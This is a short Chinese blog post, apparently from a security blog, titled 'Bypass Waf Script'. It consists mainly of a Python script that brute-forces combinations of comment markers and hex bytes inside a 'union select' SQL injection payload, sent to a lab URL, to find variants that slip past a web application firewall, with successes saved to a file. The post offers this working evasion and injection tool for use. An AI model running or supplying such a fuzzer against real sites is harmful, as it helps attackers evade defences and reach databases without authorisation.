Bypass Waf Script

字数统计: 248阅读时长: 1 min

 2020/06/18   Share

#encoding=utf-8

import requests
import random

url = "http://192.168.235.133/2.php?a=1"
Fuzz_a = ['/*!14450','*/','/**/','/','-','+']
#Fuzz_a = ['']
Fuzz_b = ['']
#Fuzz_c = ['%0a','%0b','%0c','%0d','%0e','%0f','%0h','%0i','%0j']
Fuzz_c = []
for line in open('HexValsAllBytes.txt','r').readlines():
    Fuzz_c.append(line.strip('\n'))

FUZZ = Fuzz_a+Fuzz_b+Fuzz_c
#配置fuzz字典
header = {'User-Agent':'Mozilla/5.0 (Windows NT 10.0; WOW64; rv:55.0) Gecko/20100101 Firefox/55.0'}
#设置请求的headers
for a in FUZZ:
	pass
	for b in FUZZ:
		pass
		for c in FUZZ:
			for d in FUZZ:
				pass
				for e in FUZZ:
					pass
					
					PYLOAD = "/*!uNion"+a+b+c+d+e+"seLect*/1,3333"
					urlp = url+PYLOAD
					#print(urlp)
					res = requests.get(urlp,headers=header)
					#print(res.text)
					#使用for排列组合fuzz字典并请求页面
					if '1xiaobai13333' in res.text:  #这个flag需要改，根据你测的正常页面中，有什么字段是必然出现的
						print ("[*]URL:"+ urlp +"BYPASS！")
						f=open('result.txt','a')
						f.write(urlp+"\n")
						f.close

原文作者：Fidcer

原文链接：https://vuln.top/2020/06/18/bypass/

发表日期：June 18th 2020, 2:04:16 pm

更新日期：June 18th 2020, 2:04:16 pm

Next Post

HTTP 走私协议
Previous Post

C/S 渗透测试-1

CATALOG



缺失模块。
1、请确保node版本大于6.2
2、在博客根目录（注意不是archer根目录）执行以下命令：
npm i hexo-generator-json-content --save
3、在根目录_config.yml里添加配置：

jsonContent:
  meta: false
  pages: false
  posts:
    title: true
    date: true
    path: true
    text: false
    raw: false
    content: false
    slug: false
    updated: false
    comments: false
    link: false
    permalink: false
    excerpt: false
    categories: true
    tags: true